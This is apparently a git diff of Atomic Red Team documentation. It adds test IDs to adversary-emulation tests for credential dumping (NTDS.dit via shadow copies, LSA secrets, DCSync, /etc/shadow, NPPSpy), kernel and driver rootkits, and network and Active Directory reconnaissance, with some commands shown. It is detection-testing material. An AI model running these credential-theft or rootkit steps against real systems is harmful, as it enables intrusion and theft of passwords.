## Atomic Test #4 - Create Volume Shadow Copy with WMI + +auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -228,7 +236,7 @@ wmic shadowcopy call create Volume=#{drive_letter} ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -242,17 +250,19 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell + +auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -273,17 +283,19 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy + +auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| | symlink_path | symlink path | String | C:\Temp\vssstore| diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md index 244802ff..05973de3 100644 --- a/atomics/T1003.004/T1003.004.md +++ b/atomics/T1003.004/T1003.004.md @@ -12,18 +12,20 @@
## Atomic Test #1 - Dumping LSA Secrets + +auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f + Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | psexec_exe | Path to PsExec executable | Path | PathToAtomicsFolder\T1003.004\bin\PsExec.exe| @@ -46,7 +48,7 @@ del %temp%\secrets >nul 2> nul ##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} +if (Test-Path #{psexec_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md index f86b639b..c6708587 100644 --- a/atomics/T1003.006/T1003.006.md +++ b/atomics/T1003.006/T1003.006.md @@ -14,18 +14,20 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync + +auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e + Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | Targeted domain | string | example.com| | user | Targeted user | string | krbtgt| @@ -47,7 +49,7 @@ Privileges required: domain admin or domain controller account (by default), or ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index a23a5e9c..99420fb6 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,16 +14,18 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) + +auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 + Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| | script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| @@ -56,7 +58,7 @@ rm -f "#{output_file}" ##### Check Prereq Commands: ```sh test -f #{script_path} -grep "#{pid_term}" #{script_path} +grep "#{pid_term}" #{script_path} ``` ##### Get Prereq Commands: ```sh @@ -71,16 +73,18 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) + +auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 + Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.007.bin| | script_path | Path to script generating the target process | Path | /tmp/T1003.007.sh| @@ -111,7 +115,7 @@ rm -f "#{output_file}" ##### Check Prereq Commands: ```sh test -f #{script_path} -grep "#{pid_term}" #{script_path} +grep "#{pid_term}" #{script_path} ``` ##### Get Prereq Commands: ```sh @@ -121,7 +125,7 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa ##### Description: Requires Python ##### Check Prereq Commands: ```sh -(which python || which python3 || which python2) +(which python || which python3 || which python2) ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index 52491f16..fb75bbaa 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,15 +15,17 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) -/etc/shadow file is accessed in Linux environments +auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 + +/etc/shadow file is accessed in Linux environments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| @@ -49,15 +51,17 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) -/etc/passwd file is accessed in Linux environments +auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d + +/etc/passwd file is accessed in Linux environments **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt| diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 45930a48..8b9193ca 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,6 +15,9 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump + +auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -23,14 +26,13 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe| | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC| @@ -51,7 +53,7 @@ If you see a message saying "The system cannot find the path specified", try usi ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -70,11 +72,13 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy + +auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy - **Supported Platforms:** Windows @@ -114,7 +118,7 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore ##### Description: NPPSpy.dll must be available in local temp directory ##### Check Prereq Commands: ```powershell -if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} +if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 5a6e5d8d..203a2b06 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,6 +12,9 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) + +auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -21,14 +24,13 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | volume | Drive letter of the volume to access | string | C:| diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index d08caf66..7cb3c441 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,10 +12,12 @@
## Atomic Test #1 - System Service Discovery + +auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. - **Supported Platforms:** Windows @@ -40,17 +42,19 @@ sc query state= all
## Atomic Test #2 - System Service Discovery - net.exe + +auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 + Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index c8263dd5..e706e035 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -10,17 +10,19 @@
## Atomic Test #1 - List Process Main Windows - C# .NET + +auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 + Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | %TEMP%\T1010.exe| @@ -45,7 +47,7 @@ del /f /q /s #{output_file_name} >nul 2>&1 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{input_source_code}) {exit 0} else {exit 1} +if (Test-Path #{input_source_code}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 58233009..650fef02 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -12,6 +12,9 @@ The Registry contains a significant amount of information about the operating sy
## Atomic Test #1 - Query Registry + +auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0 + Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: @@ -19,7 +22,6 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf - **Supported Platforms:** Windows diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index e9f81566..62b1a33f 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -16,15 +16,17 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
## Atomic Test #1 - Loadable Kernel Module based Rootkit -Loadable Kernel Module based Rootkit +auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 + +Loadable Kernel Module based Rootkit **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux| | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko| @@ -50,7 +52,7 @@ sudo rmmod #{rootkit_name} ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}) ##### Check Prereq Commands: ```bash -if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; +if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -68,15 +70,17 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
## Atomic Test #2 - Loadable Kernel Module based Rootkit -Loadable Kernel Module based Rootkit +auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f + +Loadable Kernel Module based Rootkit **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux| | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko| @@ -104,7 +108,7 @@ sudo depmod -a ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}) ##### Check Prereq Commands: ```bash -if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; +if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -123,6 +127,9 @@ sudo depmod -a
## Atomic Test #3 - Windows Signed Driver Rootkit Test + +auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae + This test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html @@ -132,14 +139,13 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys| | puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe| @@ -159,7 +165,7 @@ This will simulate hiding a process. ##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} +if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index 4ddc6913..fcc7fb8d 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -26,10 +26,12 @@ Adversaries may use the information from [System Network Configuration Discovery
## Atomic Test #1 - System Network Configuration Discovery on Windows + +auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23 + Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. - **Supported Platforms:** Windows @@ -56,10 +58,12 @@ net config
## Atomic Test #2 - List Windows Firewall Rules + +auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752 + Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. - **Supported Platforms:** Windows @@ -82,10 +86,12 @@ netsh advfirewall firewall show rule name=all
## Atomic Test #3 - System Network Configuration Discovery + +auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 + Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. - **Supported Platforms:** macOS, Linux @@ -111,10 +117,12 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) + +auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2 + Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. - **Supported Platforms:** Windows @@ -140,18 +148,20 @@ nltest /domain_trusts
## Atomic Test #5 - List Open Egress Ports + +auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5 + This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt| | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt| @@ -201,7 +211,7 @@ Remove-Item -ErrorAction ignore "#{output_file}" ##### Description: Test requires #{port_file} to exist ##### Check Prereq Commands: ```powershell -if (Test-Path "#{port_file}") {exit 0} else {exit 1} +if (Test-Path "#{port_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -216,16 +226,18 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects + +auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -244,7 +256,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -258,15 +270,17 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Qakbot Recon -A list of commands known to be performed by Qakbot for recon purposes +auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b + +A list of commands known to be performed by Qakbot for recon purposes **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat| @@ -287,12 +301,14 @@ A list of commands known to be performed by Qakbot for recon purposes
## Atomic Test #8 - List macOS Firewall Rules + +auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 + "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. - **Supported Platforms:** macOS diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index eff14164..2f288279 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -32,10 +32,12 @@ Specific to macOS, the bonjour protocol exists to discover addition
## Atomic Test #1 - Remote System Discovery - net + +auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd + Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. - **Supported Platforms:** Windows @@ -59,10 +61,12 @@ net view
## Atomic Test #2 - Remote System Discovery - net group Domain Computers + +auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f + Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. - **Supported Platforms:** Windows @@ -85,17 +89,19 @@ net group "Domain Computers" /domain
## Atomic Test #3 - Remote System Discovery - nltest + +auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 + Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | target_domain | Domain to query for domain controllers | String | domain.local| @@ -116,10 +122,12 @@ nltest.exe /dclist:#{target_domain}
## Atomic Test #4 - Remote System Discovery - ping sweep + +auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 + Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. - **Supported Platforms:** Windows @@ -142,10 +150,12 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
## Atomic Test #5 - Remote System Discovery - arp + +auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 + Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. - **Supported Platforms:** Windows @@ -168,10 +178,12 @@ arp -a
## Atomic Test #6 - Remote System Discovery - arp nix + +auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 + Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. - **Supported Platforms:** Linux, macOS @@ -192,7 +204,7 @@ arp -a | grep -v '^?' ##### Description: Check if arp command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -206,17 +218,19 @@ echo "Install arp on the machine."; exit 1;
## Atomic Test #7 - Remote System Discovery - sweep + +auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de + Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | start_host | Subnet used for ping sweep. | string | 1| | stop_host | Subnet used for ping sweep. | string | 254| @@ -239,10 +253,12 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
## Atomic Test #8 - Remote System Discovery - nslookup + +auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f + Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. - **Supported Platforms:** Windows @@ -270,17 +286,19 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
## Atomic Test #9 - Remote System Discovery - adidnsdump + +auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959 + This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username including domain. | string | domain\user| | acct_pass | Account password. | string | password| @@ -301,7 +319,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -310,7 +328,7 @@ echo "Python 3 must be installed manually" ##### Description: Computer must have pip installed ##### Check Prereq Commands: ```powershell -if (pip3 -V) {exit 0} else {exit 1} +if (pip3 -V) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -319,7 +337,7 @@ echo "PIP must be installed manually" ##### Description: adidnsdump must be installed and part of PATH ##### Check Prereq Commands: ```powershell -if (cmd /c adidnsdump -h) {exit 0} else {exit 1} +if (cmd /c adidnsdump -h) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -333,16 +351,18 @@ pip3 install adidnsdump
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects + +auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -361,7 +381,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -375,16 +395,18 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects + +auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e + Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe| @@ -403,7 +425,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{adfind_path}) {exit 0} else {exit 1} +if (Test-Path #{adfind_path}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md index 697f4045..f7ba85be 100644 --- a/atomics/T1020/T1020.md +++ b/atomics/T1020/T1020.md @@ -12,17 +12,19 @@ When automated exfiltration 